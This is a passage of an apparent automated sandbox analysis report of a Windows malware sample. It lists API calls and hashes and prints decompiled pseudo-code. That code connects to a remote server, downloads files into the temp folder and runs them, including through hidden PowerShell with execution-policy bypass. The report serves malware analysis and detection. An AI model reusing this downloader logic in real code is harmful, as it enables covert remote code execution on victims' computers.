Opcode ID: d71099a73d7026dc59f0c7b4bc2e69570a97c2889642fbac6f968f471a78b990
Instruction ID: 8aa3222b7a54f4c441c47007d6b20f582d72c68b87d4c1fdf5df5a18c5f8f8b8
Opcode Fuzzy Hash: d71099a73d7026dc59f0c7b4bc2e69570a97c2889642fbac6f968f471a78b990
Instruction Fuzzy Hash: 3801B970901218BADF10AF518C5AEEE767CAF41304F5041BBB549B50D1DB789B848E5F

Uniqueness

Uniqueness Score: -1.00%

Function 00622ACE, Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B2A
LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B34
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00622B4B
GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00622B5B
LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B73
CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00622B7B

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: Local$Free$AllocAuthorityCloseHandleInformationToken
String ID:
API String ID: 1586583212-0
Opcode ID: ecc68a0251e122bc8051bfa61ecfa5384c210e50f1ef1634e58e52fde3da91e0
Instruction ID: da0062497e9f1d776cae458f56f24cea3b44afb5988f6852bcda2e38323c2cbd
Opcode Fuzzy Hash: ecc68a0251e122bc8051bfa61ecfa5384c210e50f1ef1634e58e52fde3da91e0
Instruction Fuzzy Hash: 27114731D0052AFADF41ABD4EC02FEEBB7AAF04704F004569B210B92A1DB758B14AF64

Uniqueness

Uniqueness Score: -1.00%

Function 00621281, Relevance: 9.1, APIs: 6, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004026A1,004027BF,00000000,00000000), ref: 006212AC
OpenMutexA.KERNEL32(00100000,00000000,0040510B), ref: 006212BD
CreateMutexA.KERNEL32(00000000,00000000,0040510B,00100000,00000000,0040510B,00000000,00000000,004026A1,004027BF,00000000,00000000,?,?,?,00000000), ref: 006212D1
EnumWindows.USER32(00402487,00000000), ref: 006212F9
GetModuleFileNameA.KERNEL32(00000000,?,00000100,00402487,00000000,00405111,00000000,00000000,0040510B,00100000,00000000,0040510B,00000000,00000000,004026A1,004027BF), ref: 00621318
Sleep.KERNEL32(0000EA60,0040510B,00000000,?,00405111,00000000,00000001,00000000,?,00000100,00402487,00000000,00402487,00000000,00405111,00000000), ref: 0062133E

Part of subcall function 00621799: Sleep.KERNEL32(0002BF20,?,?,?,00405076,000000FF,?,00000202,?,00002710,?), ref: 0062183E

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: CreateMutexSleep$EnumFileModuleNameOpenThreadWindows
String ID:
API String ID: 3866134860-0
Opcode ID: 46e758ca8e1888c96091b89d1b5283f4c94d6fb4f8bbddfd54f4e5bf370d84cc
Instruction ID: 49b47f359d1986660ec0d7f059f917bb47e89068776fe03e152bdafd4fdb8c88
Opcode Fuzzy Hash: 46e758ca8e1888c96091b89d1b5283f4c94d6fb4f8bbddfd54f4e5bf370d84cc
Instruction Fuzzy Hash: A40196307C4B35B6E6A0B6A05D53F9E61199B01F01F240469B744BD1C2CAF857408D7E

Uniqueness

Uniqueness Score: -1.00%

Function 006222F8, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239timeCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0062232C

Part of subcall function 00622ACE: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B2A
Part of subcall function 00622ACE: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B34
Part of subcall function 00622ACE: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00622B4B
Part of subcall function 00622ACE: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00622B5B
Part of subcall function 00622ACE: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00622B73
Part of subcall function 00622ACE: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00622B7B

GetLocalTime.KERNEL32(?,?,00000030,?,006220EA,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 006224C1
SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,006220EA,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 006224D4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,006220EA,?,00000014,?,00000000,00000001,00000000,00000018), ref: 00622505

Strings

0, xrefs: 00622524

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: Time$Local$FileFreeSystem$AllocAuthorityCloseHandleInformationInitializeToken
String ID: 0
API String ID: 1744783010-4108050209
Opcode ID: 73d2a32ad973e6507444423bd463984556881c0eee01d0562af38525a1824e78
Instruction ID: 576edc8fd55e57461b29e921d7ecf8eb8d266352bf8512b4d13d3e880e0ad711
Opcode Fuzzy Hash: 73d2a32ad973e6507444423bd463984556881c0eee01d0562af38525a1824e78
Instruction Fuzzy Hash: 2FA1E8B5900628AFDB50EB94CC95FDAB3BDAF48304F1040D6E609E7251DB74AE85CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00402DC6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DC6(CHAR* _a4, void* _a8, long _a12, long _a16, long _a20) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				void* _t16;

				_v16 = 0x64;
				while(1) {
					_t16 = CreateFileA(_a4, 0x40000000, 0, 0, _a16, 0x80, 0);
					_v8 = _t16;
					if(_t16 != 0xffffffff || _v16 == 0) {
						break;
					}
					_v16 = _v16 - 1;
				}
				if(_v8 != 0xffffffff) {
					SetFilePointer(_v8, 0, 0, _a20);
					WriteFile(_v8, _a8, _a12,  &_v12, 0);
					return CloseHandle(_v8);
				}
				return _t16;
			}

0x00402dcf
0x00402dd6
0x00402dec
0x00402df1
0x00402df7
0x00000000
0x00000000
0x00402dff
0x00402dff
0x00402e08
0x00402e14
0x00402e28
0x00000000
0x00402e30
0x00402e39

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00402DEC
SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00402E14
WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00402E28
CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00402E30

Strings

d, xrefs: 00402DCF

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID: d
API String ID: 3604237281-2564639436
Opcode ID: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction ID: 9f02c6c91d55e6c91743ec0969cdaa1df374496b200545e5b565d8914b63410a
Opcode Fuzzy Hash: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction Fuzzy Hash: EA016231940208FADF219F95CD4AFCE7B39AB05764F204266B720741E0D7B55E61EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00621349, Relevance: 7.6, APIs: 5, Instructions: 90networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000000), ref: 006213D3
ioctlsocket.WS2_32(?,8004667E,?), ref: 006213FB
connect.WS2_32(?,?,00000010), ref: 00621409
select.WS2_32(00000000,00000000,?,00000000,?), ref: 0062142F
ioctlsocket.WS2_32(?,8004667E,?), ref: 00621452

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: ioctlsocket$connecthtonsselect
String ID:
API String ID: 3844996356-0
Opcode ID: 2256ee2706dcf72c894a44fc722725e338eaf0a637b17f15df246a49cf4cb852
Instruction ID: 5661f6a735cd8f946fad280228927603ad3ab10e9611ce799f0facabfcd3425f
Opcode Fuzzy Hash: 2256ee2706dcf72c894a44fc722725e338eaf0a637b17f15df246a49cf4cb852
Instruction Fuzzy Hash: E9314570A0022DBADB50EBA0DC42FDEB77AEF08314F000499F604B6191D7B5AB549F68

Uniqueness

Uniqueness Score: -1.00%

Function 00401351, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00401351(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				char _v1072;
				char _v1076;
				char _v1080;
				char _v1084;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __eflags;
				E00402BA3( &_v1084,  &_v16 - _t59);
				E0040151C(_a16);
				if(E004010F9(__edx, _t61,  &_v8, _a4, _a8, 0xa) != 0) {
					_t40 = E00402997(_v8,  &_v1072, wsprintfA( &_v1072, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0);
					_t58 = 0;
					while(_t58 <= 0x400) {
						_t13 =  &_v1072; // -1068
						_t40 = E00402A1E(__eflags, _v8, _t58 + _t13, 1, 0xa);
						__eflags = _t40 - 1;
						if(_t40 == 1) {
							_t58 = _t58 + 1;
							__eflags = _t58 - 4;
							if(__eflags < 0) {
								continue;
							} else {
								__eflags =  *[ss:edi+ebp-0x430] - 0xa0d0a0d;
								if(__eflags != 0) {
									continue;
								} else {
									while(1) {
										_t15 =  &_v1076; // 0xa0d0a0d
										_push(0x4004667f);
										_push(_v8);
										L00403090();
										__eflags = _v1076;
										if(_v1076 == 0) {
											_v1076 = 0x1000;
										}
										_t40 = E004014B3( &_v1080, _v1084, _v1076 + _v1084);
										__eflags = _t40;
										if(_t40 == 0) {
											goto L14;
										}
										while(1) {
											__eflags = _v1076;
											if(__eflags == 0) {
												break;
											}
											_t40 = E00402A1E(__eflags, _v8, _v1080 + _v1084, _v1076, 0xa);
											__eflags = _t40;
											if(_t40 > 0) {
												_v1084 = _v1084 + _t40;
												_t29 =  &_v1076;
												 *_t29 = _v1076 - _t40;
												__eflags =  *_t29;
												continue;
											}
											goto L14;
										}
									}
								}
							}
						}
						goto L14;
					}
				}
				L14:
				E00402A71(_t40, _v8);
				E00402B1C( &_v1080, _a16, 4);
				return _v1084;
			}

0x00401351
0x00401368
0x00401370
0x00401388
0x004013b5
0x004013ba
0x00401481
0x004013c5
0x004013d0
0x004013d5
0x004013d8
0x004013de
0x004013df
0x004013e2
0x00000000
0x004013e8
0x004013e8
0x004013f4
0x00000000
0x00000000
0x004013fa
0x004013fa
0x00401401
0x00401406
0x00401409
0x0040140e
0x00401415
0x00401417
0x00401417
0x0040143b
0x00401440
0x00401442
0x00000000
0x00000000
0x00401473
0x00401473
0x0040147a
0x00000000
0x00000000
0x0040145e
0x00401463
0x00401465
0x00401467
0x0040146d
0x0040146d
0x0040146d
0x00000000
0x0040146d
0x00000000
0x00401465
0x0040147c
0x004013fa
0x004013f4
0x004013e2
0x00000000
0x004013d8
0x00401481
0x0040148d
0x00401490
0x004014a1
0x004014b0

APIs

Part of subcall function 0040151C: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00402078,?,?,?,00000000,00010000,00003000,00000004,00000000), ref: 00401533

Part of subcall function 004010F9: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?), ref: 0040111B
Part of subcall function 004010F9: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?), ref: 0040114B
Part of subcall function 004010F9: htons.WSOCK32(?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001), ref: 00401183
Part of subcall function 004010F9: ioctlsocket.WSOCK32(?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 004011AB
Part of subcall function 004010F9: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?), ref: 004011B9
Part of subcall function 004010F9: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004011DF
Part of subcall function 004010F9: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 00401202

wsprintfA.USER32 ref: 004013A0

Part of subcall function 00402997: WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 004029B2
Part of subcall function 00402997: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00402A0F

ioctlsocket.WSOCK32(?,4004667F,), ref: 00401409

Strings

, xrefs: 004013FA, 00401400
GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00401394

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ioctlsocket$EventFreeObjectSingleVirtualWaitconnecthtonsselectsetsockoptsocketwsprintf
String ID: $GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
API String ID: 3096608166-2676332027
Opcode ID: c861de531235c7084ea78be7fce6cefa398647138f99206c169987c40781cd37
Instruction ID: 434c8e4364e880c9d98e857f0535121a821500db1cdf89a4e2bee5d2e916f05a
Opcode Fuzzy Hash: c861de531235c7084ea78be7fce6cefa398647138f99206c169987c40781cd37
Instruction Fuzzy Hash: B6313FB1900118AADF219EA5CD85FDE7778AB44318F4011A6FA04B20E1D7799B94DF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402997, Relevance: 6.1, APIs: 4, Instructions: 53
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402997(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				char _v8;
				char _v28;
				char* _t20;
				intOrPtr _t24;

				_v8 = 0xa;
				if(_a16 != 0) {
					WaitForSingleObject(_a16, 0xffffffff);
				}
				_t24 = _a8;
				while(_a12 != 0) {
					E00402B69(_a4, 0,  &_v28, 0, 0);
					_push(0);
					_push(0);
					_t20 =  &_v28;
					_push(_t20);
					_push(0);
					_push(0);
					L0040309C();
					if(_t20 == 1) {
						_push(0);
						_push(_a12);
						_push(_t24);
						_push(_a4);
						L004030A2();
						if(_t20 > 0) {
							_a12 = _a12 - _t20;
							_t24 = _t24 + _t20;
							_t12 =  &_v8;
							 *_t12 = _v8 - 1;
							if( *_t12 != 0) {
								continue;
							}
						}
					}
					break;
				}
				if(_a16 != 0) {
					SetEvent(_a16);
				}
				return _a12;
			}

0x004029a0
0x004029ab
0x004029b2
0x004029b2
0x004029b7
0x00402a00
0x004029c9
0x004029ce
0x004029d0
0x004029d2
0x004029d5
0x004029d6
0x004029d8
0x004029da
0x004029e2
0x004029e4
0x004029e6
0x004029e9
0x004029ea
0x004029ed
0x004029f4
0x004029f6
0x004029f9
0x004029fb
0x004029fb
0x004029fe
0x00000000
0x00000000
0x004029fe
0x004029f4
0x00000000
0x004029e2
0x00402a0a
0x00402a0f
0x00402a0f
0x00402a1b

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 004029B2
select.WSOCK32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 004029DA
send.WSOCK32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 004029ED
SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00402A0F

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: EventObjectSingleWaitselectsend
String ID:
API String ID: 3746265427-0
Opcode ID: ae7759b12bde2a1f6bc2d48f4d2165acd9d1a4802c5ec1c5ac6807ccf138895e
Instruction ID: d54d53443cf9217a947d93b0e8418d9fb27df71b2428d5f491059bff16967c37
Opcode Fuzzy Hash: ae7759b12bde2a1f6bc2d48f4d2165acd9d1a4802c5ec1c5ac6807ccf138895e
Instruction Fuzzy Hash: EC115E31600249AAEF20DE55CE4AFDF3B6CAB00715F100137BA11B51D0C7F99A60CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00623016, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,40000000,00000000,00000000,?,00000080,00000000,?,?), ref: 0062303C
CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00623080

Strings

d, xrefs: 0062301F

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: CloseCreateFileHandle
String ID: d
API String ID: 3498533004-2564639436
Opcode ID: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction ID: 97cad9fdd55f347b71e39dd782225d45638568cbb3d12e43c548300ecfc7d614
Opcode Fuzzy Hash: b48929ffc05c4d8dbf09a504efa7211444ddbe2eebdd9ec3fe2fc56b531eaf58
Instruction Fuzzy Hash: 41014B31900628FADF219F94EC06FCEBB36AB00724F204255F620742E0C7755B24EF64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ZDqKJkJ1Sb.exe PID: 5916 Parent PID: 904 ZDqKJkJ1Sb.exeCOMMON

Executed Functions

Function 0040197F, Relevance: 35.5, APIs: 15, Strings: 5, Instructions: 494
memorynetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040197F(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				void* _v64;
				long _v68;
				char _v72;
				void* _v80;
				char _v84;
				char _v112;
				char _v124;
				CHAR* _v128;
				void* _v132;
				void* _v136;
				char _v936;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				void* _v1748;
				int _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				int _v1764;
				char _v1768;
				int _v1788;
				int _v1792;
				char _v1796;
				char _v1809;
				char _v1810;
				char _v1811;
				char _v1812;
				void* _t222;
				char* _t255;
				void* _t257;
				void* _t261;
				intOrPtr _t264;
				long _t272;
				void* _t278;
				void* _t297;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				void* _t301;
				void* _t306;
				void* _t307;
				void* _t309;
				void* _t312;
				intOrPtr* _t314;
				char* _t315;
				CHAR* _t316;
				void** _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				CHAR* _t323;
				void* _t324;
				void* _t325;

				_t309 = __edx;
				E00402BA3( &_v1812,  &_v16 - _t325);
				_v1748 = CreateEventA(0, 0, 1, 0);
				if(_a4 == 0) {
					L3:
					_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4); // executed
					_t329 = _t205;
					if(_t205 == 0) {
						L67:
						E00402A71(_t205, _v936);
						_t319 =  &_v936;
						_t297 = 0xc8;
						do {
							 *_t319 = 0;
							_t319 =  &(_t319[1]);
							_t297 = _t297 - 1;
							__eflags = _t297;
						} while (_t297 != 0);
						do {
							__eflags = 0;
							asm("repe scasd");
						} while (0 != 0);
						CloseHandle(_v1748);
						E0040151C( &_v64);
						E0040151C( &_v128);
						__eflags = _v1792 - 1;
						if(__eflags == 0) {
							E004023E6(__eflags, "wow64");
							ExitProcess(0);
						}
						return _v1788;
					}
					_v128 = _t205;
					_t314 = _v128;
					 *_t314 = 0x100;
					_push(_t314);
					_push(_t314 + 0x52);
					_push(2); // executed
					L004030E4(); // executed
					_t205 = E004010F9(_t309, _t329,  &_v936, _a4, _a8, 0xa); // executed
					_t330 = _t205;
					if(_t205 == 0) {
						goto L67;
					}
					_v72 = 2;
					_v68 = 4;
					_v1764 = 1;
					_v1760 = 0x927c0;
					_v1756 = 0x2710;
					_push(0);
					_push(0);
					_push( &_v1768);
					_push(0);
					_push(0);
					_push(0xc);
					_push( &_v1764);
					_push(0x98000004);
					_push(_v936);
					L004030C0(); // executed
					E00402B1C(0x405081, _t314 + 0x1c, 0x32);
					 *((short*)(_t314 + 0x4e)) = E004027F9(_t330);
					_t222 = E0040287E(); // executed
					if(_t222 - 0x2000 > 0) {
						 *((char*)(_t314 + 0x50)) = 2;
					}
					 *((char*)(_t314 + 0x51)) = E0040284C();
					 *((char*)(_t314 + 0x7b)) = 0;
					GetVolumeInformationA(0, 0, 0, _t314 + 0x7c, 0, 0, 0, 0); // executed
					E004025D9(0x405081, 0x32, _t314 + 0x4e, 0x32);
					_t205 = E00402997(_v936,  &(_v128[0x1c]), 0x64, 0); // executed
					L8:
					while(1) {
						while(_v80 == 0 && _v136 != 4) {
							E00402B69(_v936, 0,  &_v124, 0x78, 0);
							_push( &_v112);
							_push(0);
							_push(0);
							_t205 =  &_v124;
							_push(_t205);
							_push(0); // executed
							L0040309C(); // executed
							if(_t205 < 0) {
								goto L67;
							}
							if(_t205 != 0) {
								break;
							}
							if(_v132 != 0 || _v136 != 0) {
								goto L67;
							} else {
								_v1788 = 1;
								continue;
							}
						}
						_t315 = _v128;
						__eflags = _v132;
						if(_v132 != 0) {
							L17:
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								__eflags = _v80;
								if(__eflags != 0) {
									L26:
									_t310 = _v132;
									_t306 = ( *(_t315 + 2) & 0x0000ffff) - _v132;
									__eflags = _v80 - _t306;
									if(__eflags <= 0) {
										_t306 = _v80;
									}
									E00402B1C(_v84, _t310 + _t315 + 4, _t306);
									_v84 = _v84 + _t306;
									_v80 = _v80 - _t306;
									_v132 = _v132 + _t306;
									_t205 = E00402D74(__eflags,  &_v132, _t315 + 2, 2);
									__eflags = _t205 - 1;
									if(_t205 != 1) {
										L58:
										_v136 = 0;
										L66:
										continue;
									} else {
										E004025D9(0x405081, 0x32, _t315 + 4,  *(_t315 + 2) & 0x0000ffff);
										_t299 =  *(_t315 + 1) & 0x000000ff;
										__eflags =  *_t315 - 0xffff;
										if( *_t315 != 0xffff) {
											__eflags =  *_t315;
											if( *_t315 != 0) {
												_t205 = E00402997( *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)), _t315 + 4,  *(_t315 + 2) & 0x0000ffff, 0);
												L57:
												_v132 = 0;
												goto L58;
											}
											_t205 = VirtualAlloc(0, 0x10000, 0x3000, 4);
											__eflags = _t205;
											if(_t205 == 0) {
												goto L67;
											}
											_t320 = _t205;
											E00402B1C(_t315, _t320, 0x180);
											 *((intOrPtr*)(_t320 + 0x180)) =  &_v1736;
											 *(_t320 + 0x184) = _t299;
											_t150 = _t320 + 0x188; // 0x188
											E00402B1C( &_v1748, _t150, 4);
											_t255 =  &_v936;
											 *((intOrPtr*)(_t320 + 0x18c)) = _t255;
											 *(_t320 + 0x190) = _t320;
											__eflags =  *((char*)(_t320 + 7)) - 4;
											if( *((char*)(_t320 + 7)) == 4) {
												_push(6);
												_push(1);
												_push(0x17);
												L004030B4();
											} else {
												_push(6);
												_push(1);
												_push(2);
												L004030B4();
											}
											 *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)) = _t255;
											_v1752 = 1;
											_push(4);
											_push( &_v1752);
											_push(1);
											_push(6);
											_push( *((intOrPtr*)(_t324 + _t299 * 4 - 0x3a4)));
											L004030A8();
											 *((intOrPtr*)(_t324 + _t299 * 4 - 0x6c4)) = CreateThread(0, 0, E004015FC, _t320, 0, 0);
											goto L57;
										}
										_t300 = _v128;
										_t257 =  *(_t300 + 2) & 0x0000ffff;
										 *((char*)(_t257 + _t300 + 4)) = 0;
										_t321 = _t257;
										E00402BA3( &_v1796, 4);
										while(1) {
											_t322 = _t321;
											__eflags = _t322;
											if(__eflags == 0) {
												break;
											}
											__eflags =  *((char*)(_t322 + _t300 + 8)) - 0x23;
											if(__eflags != 0) {
												_t321 = _t322 - 1;
												__eflags = _t321;
												continue;
											}
											_t83 = _t300 + 9; // 0x9
											_v1796 = _t322 + _t83;
											 *((char*)(_t322 + _t300 + 8)) = 0;
											break;
										}
										_v1812 = 0x65;
										_v1811 = 0x78;
										_v1810 = 0x65;
										_v1809 = 0;
										_t261 = E00402CE4(__eflags, _t300 + 8);
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x7362762e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x7362762e) {
											_v1812 = 0x76;
											_v1811 = 0x62;
											_v1810 = 0x73;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x7461622e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x7461622e) {
											_v1812 = 0x62;
											_v1811 = 0x61;
											_v1810 = 0x74;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x646d632e;
										if( *((intOrPtr*)(_t261 + _t300 + 4)) == 0x646d632e) {
											_v1812 = 0x63;
											_v1811 = 0x6d;
											_v1810 = 0x64;
											_v1809 = 0;
										}
										__eflags =  *((intOrPtr*)(_t261 + _t300 + 4)) - 0x3173702e;
										if(__eflags == 0) {
											_v1812 = 0x70;
											_v1811 = 0x73;
											_v1810 = 0x31;
											_v1809 = 0;
										}
										_t264 = E0040121E(__eflags, _t300 + 8,  &_v1740);
										__eflags = _t264 - 0x400;
										if(_t264 <= 0x400) {
											L49:
											_t205 = E0040151C( &_v1740);
											goto L57;
										} else {
											_v1744 = _t264;
											_t323 = _v128;
											 *((short*)(_t323 + 2)) = 4;
											E004025D9(0x405081, 0x32, _t323 + 1, 3);
											E004025D9(0x405081, 0x32, _t323 + 4, 4);
											E00402997(_v936, _t323 + 1, 7, _v1748);
											_t316 = _v128;
											_t272 = GetTempPathA(0x200, _t316);
											_t317 =  &(_t316[_t272]);
											__eflags =  &(_t316[_t272]);
											asm("stosb");
											_t127 = E00402D95(0x5c, 4) + 4; // 0x4
											_t301 = _t127;
											do {
												_t274 = E00402D95(_t274, 0x18) + 0x61;
												asm("stosb");
												_t301 = _t301 - 1;
												__eflags = _t301;
											} while (__eflags != 0);
											asm("stosb");
											_t128 =  &_v1812; // 0x65
											_t278 = E00402CE4(__eflags, _t128);
											_t130 =  &_v1812; // 0x65
											E00402B1C(_t130, _t317, _t278 + 1);
											E00402D95(E00402DC6(_v128, _v1740, _v1744, 2, 0), 0x18);
											asm("stosb");
											asm("loop 0xfffffff5");
											asm("stosb");
											__eflags = _v1812 - 0x317370;
											if(__eflags != 0) {
												E004020A8(__eflags, _t323 + 0x200, 0x14, _v128, 0, 1, 0);
											} else {
												E00402B1C("-WindowStyle Hidden -ep bypass -file \"", _t323 + 0x400, 0x26);
												 *((short*)(E00402CE4(__eflags, _v128) + _t323 + 0x426)) = 0x22;
												E00402B1C(_v128, _t323 + 0x426, _t290);
												E004020A8(__eflags, _t323 + 0x200, 0x14, "powershell", _t323 + 0x400, 1, 0);
											}
											goto L49;
										}
									}
								}
								_t205 = E00402A1E(__eflags, _v936, _v64, 0x10000, 0);
								__eflags = _t205;
								if(_t205 <= 0) {
									goto L67;
								}
								_v80 = _t205;
								E00402B1C( &_v64,  &_v84, 4);
								goto L26;
							}
							__eflags =  *_t315 - 0xff;
							if( *_t315 != 0xff) {
								L21:
								_t298 =  *(_t315 + 1) & 0x000000ff;
								__eflags =  *(_t324 + _t298 * 4 - 0x3a4);
								if( *(_t324 + _t298 * 4 - 0x3a4) != 0) {
									 *(_t324 + _t298 * 4 - 0x3a4) = 0;
								}
								goto L58;
							}
							__eflags =  *(_t315 + 1) - 0xfe;
							if( *(_t315 + 1) != 0xfe) {
								goto L21;
							}
							_v1792 = 1;
							goto L67;
						}
						__eflags = _v136 - 4;
						if(_v136 != 4) {
							__eflags = _v80;
							if(__eflags != 0) {
								L62:
								_t307 = _v136;
								_t312 = 4 - _v136;
								__eflags = _v80 - 4;
								if(_v80 < 4) {
									_t312 = _v80;
								}
								_t205 = E00402B1C(_v84, _t307 + _t315, _t312);
								_v84 = _v84 + _t312;
								_v80 = _v80 - _t312;
								_v136 = _v136 + _t312;
								__eflags = _v136 - 4;
								if(_v136 == 4) {
